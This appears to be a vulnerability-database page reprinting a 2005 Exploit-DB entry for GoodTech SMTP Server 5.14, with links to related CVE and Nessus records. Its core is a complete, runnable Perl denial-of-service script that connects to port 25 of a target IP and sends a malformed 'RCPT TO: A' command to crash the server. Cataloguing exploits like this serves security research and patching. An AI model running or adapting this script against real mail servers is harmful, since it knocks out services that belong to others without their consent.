Lucene search
+L

GoodTech SMTP Server 5.14 - Denial of Service

🗓️ 07 Jun 2005 00:00:00Reported by Reed ArvinType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

GoodTech SMTP Server 5.14 - Denial of Service attack via scrip

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
GoodTech < 5.15 SMTP RCPT TO: Single Character DoS (deprecated)
7 Jun 200500:00
nessus
nessus
Tenable Nessus
GoodTech SMTP Server Malformed RCPT TO Command DoS
8 Jun 200500:00
nessus
cve
CVE
CVE-2005-1931
30 Jun 200504:00
cve
cvelist
Cvelist
CVE-2005-1931
30 Jun 200504:00
cvelist
euvd
EUVD
EUVD-2005-1933
7 Oct 202500:30
euvd
nvd
NVD
CVE-2005-1931
5 Jul 200504:00
nvd
#===== Start GoodTechSMTPServer_DOS.pl =====
#
# Usage: GoodTechSMTPServer_DOS.pl <ip>
#        GoodTechSMTPServer_DOS.pl 127.0.0.1
#
# GoodTech SMTP Server for Windows NT/2000/XP version 5.14
#
# Download:
# http://www.goodtechsys.com/
#
##########################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "25",
                                    Proto    => "TCP"))
{
        print "Attempting to kill GoodTech SMTP Server at $ARGV[0]:25...";

        sleep(1);

        print $socket "HELO moto.com\r\n";

        sleep(1);

        print $socket "RCPT TO: A\r\n";

        close($socket);
}
else
{
        print "Cannot connect to $ARGV[0]:25\n";
}
#===== End GoodTechSMTPServer_DOS.pl =====

# milw0rm.com [2005-06-07]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jun 2005 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02451
32